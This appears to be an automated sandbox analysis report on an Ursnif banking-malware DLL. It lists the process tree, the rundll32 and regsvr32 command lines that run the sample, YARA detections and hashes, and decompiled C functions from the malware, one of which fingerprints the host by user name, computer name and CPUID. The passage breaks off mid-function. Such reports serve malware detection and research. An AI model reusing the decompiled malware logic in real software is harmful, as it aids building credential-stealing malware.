                                                                                                                                                                                                                              Imagebase:0xaa0000
                                                                                                                                                                                                                              File size:893440 bytes
                                                                                                                                                                                                                              MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: cmd.exe PID: 6992 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:28
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 7000 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll
                                                                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: rundll32.exe PID: 7012 Parent PID: 6992

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: iexplore.exe PID: 7020 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:29
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              Imagebase:0x7ff721e20000
                                                                                                                                                                                                                              File size:823560 bytes
                                                                                                                                                                                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: rundll32.exe PID: 7052 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:31
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: iexplore.exe PID: 7104 Parent PID: 7020

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:32
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                              Imagebase:0x1050000
                                                                                                                                                                                                                              File size:822536 bytes
                                                                                                                                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: rundll32.exe PID: 3684 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:36
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Analysis Process: rundll32.exe PID: 6164 Parent PID: 6980

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Start time:10:51:47
                                                                                                                                                                                                                              Start date:23/11/2021
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts
                                                                                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                                                                                              File size:61952 bytes
                                                                                                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                              Chronological Activities

                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Analysis Process: loaddll32.exe PID: 6980 Parent PID: 1868 loaddll32.exeCOMMON

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 00A89DE1, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E00A89DE1(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xa8d2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00A84E13( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xa8d2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xa8d270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00A8680B(_v8 + _v8, _t64);
							}
							HeapFree( *0xa8d270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xa8d270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00A8680B(_v8 + _v8, _t64);
						}
						HeapFree( *0xa8d270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                                                                                                                                0x00a89de1
                                                                                                                                                                                                                                0x00a89de9
                                                                                                                                                                                                                                0x00a89ded
                                                                                                                                                                                                                                0x00a89df0
                                                                                                                                                                                                                                0x00a89df5
                                                                                                                                                                                                                                0x00a89df7
                                                                                                                                                                                                                                0x00a89dfc
                                                                                                                                                                                                                                0x00a89dfc
                                                                                                                                                                                                                                0x00a89e02
                                                                                                                                                                                                                                0x00a89e04
                                                                                                                                                                                                                                0x00a89e11
                                                                                                                                                                                                                                0x00a89e72
                                                                                                                                                                                                                                0x00a89e13
                                                                                                                                                                                                                                0x00a89e18
                                                                                                                                                                                                                                0x00a89e1e
                                                                                                                                                                                                                                0x00a89e23
                                                                                                                                                                                                                                0x00a89e31
                                                                                                                                                                                                                                0x00a89e35
                                                                                                                                                                                                                                0x00a89e44
                                                                                                                                                                                                                                0x00a89e4b
                                                                                                                                                                                                                                0x00a89e52
                                                                                                                                                                                                                                0x00a89e52
                                                                                                                                                                                                                                0x00a89e5d
                                                                                                                                                                                                                                0x00a89e5d
                                                                                                                                                                                                                                0x00a89e35
                                                                                                                                                                                                                                0x00a89e23
                                                                                                                                                                                                                                0x00a89e74
                                                                                                                                                                                                                                0x00a89e7a
                                                                                                                                                                                                                                0x00a89e84
                                                                                                                                                                                                                                0x00a89e86
                                                                                                                                                                                                                                0x00a89e8b
                                                                                                                                                                                                                                0x00a89e9a
                                                                                                                                                                                                                                0x00a89e9e
                                                                                                                                                                                                                                0x00a89ea9
                                                                                                                                                                                                                                0x00a89eb0
                                                                                                                                                                                                                                0x00a89eb7
                                                                                                                                                                                                                                0x00a89eb7
                                                                                                                                                                                                                                0x00a89ec3
                                                                                                                                                                                                                                0x00a89ec3
                                                                                                                                                                                                                                0x00a89e9e
                                                                                                                                                                                                                                0x00a89ece
                                                                                                                                                                                                                                0x00a89ed0
                                                                                                                                                                                                                                0x00a89ed3
                                                                                                                                                                                                                                0x00a89ed5
                                                                                                                                                                                                                                0x00a89ed8
                                                                                                                                                                                                                                0x00a89edb
                                                                                                                                                                                                                                0x00a89ee5
                                                                                                                                                                                                                                0x00a89ee9
                                                                                                                                                                                                                                0x00a89eed

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A89E18
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A89E2F
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00A89E3C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A8587F), ref: 00A89E5D
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A89E84
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A89E98
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A89EA5
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00A8587F), ref: 00A89EC3
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3239747167-1536154274
                                                                                                                                                                                                                                • Opcode ID: 9be7ab49fb24a8199fd0e82526f4226cff2ab13b2738179620c4245da5b25465
                                                                                                                                                                                                                                • Instruction ID: 076cce91c82eb1e6232d105e15d5b2cd0525d8c51bafc6de7458a3f3e1929bc2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9be7ab49fb24a8199fd0e82526f4226cff2ab13b2738179620c4245da5b25465
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14310D71A00209EFDB10EFA9DD81AAEBBF9FF48350F254469E545D7260E730DE069B11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6760, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 211libraryCOMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E736D6760(CHAR* __ecx, intOrPtr* __edx) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				intOrPtr* _t80;
				char _t81;
				intOrPtr _t84;
				intOrPtr* _t86;
				struct HINSTANCE__* _t87;
				signed int _t89;
				signed int _t95;
				signed int _t101;
				signed int _t107;
				signed int _t113;
				signed int _t117;
				signed char _t121;
				signed char _t122;
				signed char _t123;
				signed char _t124;
				signed char _t125;
				signed char _t126;
				signed int _t134;
				signed int _t137;
				signed int _t140;
				signed int _t143;
				signed int _t144;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t159;
				intOrPtr* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				signed int _t164;
				intOrPtr* _t165;
				signed int _t166;
				intOrPtr* _t167;
				signed int _t168;
				void* _t176;

				_t80 = __ecx;
				_v16 = __edx;
				_t163 = __edx;
				_t149 = 0;
				_v8 = __ecx;
				_t121 =  *__edx;
				if(_t121 != 0) {
					do {
						_t146 = _t121 + 0x00000020 & 0x000000ff;
						_t163 = _t163 + 1;
						_t117 = _t121 & 0x000000ff;
						_t121 =  *_t163;
						_t147 =  >=  ? _t117 : _t146;
						_t118 =  >=  ? _t117 : _t146;
						_t149 = _t149 * 0x00000101 + ( >=  ? _t117 : _t146) ^ ( >=  ? _t117 : _t146) << 0x00000010;
					} while (_t121 != 0);
					_t80 = _v8;
				}
				_t122 =  *_t80;
				_t164 = 0;
				_t159 = _t80;
				while(_t122 != 0) {
